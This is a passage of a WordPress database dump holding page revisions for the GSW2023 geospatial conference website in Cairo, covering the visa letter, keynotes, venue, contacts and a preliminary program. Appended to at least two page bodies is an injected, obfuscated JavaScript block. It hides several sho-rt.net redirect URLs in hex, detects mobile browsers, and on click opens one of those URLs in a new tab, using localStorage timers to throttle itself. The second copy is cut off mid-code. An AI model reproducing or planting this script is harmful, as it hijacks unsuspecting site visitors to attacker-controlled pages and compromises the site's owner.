main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:51:54','2023-06-21 23:51:54','',3066,'https://gsw2023.com/?p=4739',0,'revision','',0),
(4741,1,'2023-06-23 20:12:13','2023-06-23 20:12:13','','Picture1','','inherit','open','closed','','picture1','','','2023-06-23 20:12:13','2023-06-23 20:12:13','',2669,'https://gsw2023.com/wp-content/uploads/2023/06/Picture1.png',0,'attachment','image/png',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4742,1,'2023-06-23 20:14:06','2023-06-23 20:14:06','<p>[vc_row][vc_column][vc_single_image image=\"4741\" img_size=\"1900x600\" title=\"Preliminary Program\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<p style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong>Tutorials</strong></span></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<p>&nbsp;</p>\n<p style=\"color: gray;\"><strong><span style=\"font-size: 14pt;\">Instruction for Oral Presentations</span></strong></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>More instructions will be announced once the program in complete in May 2023.</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 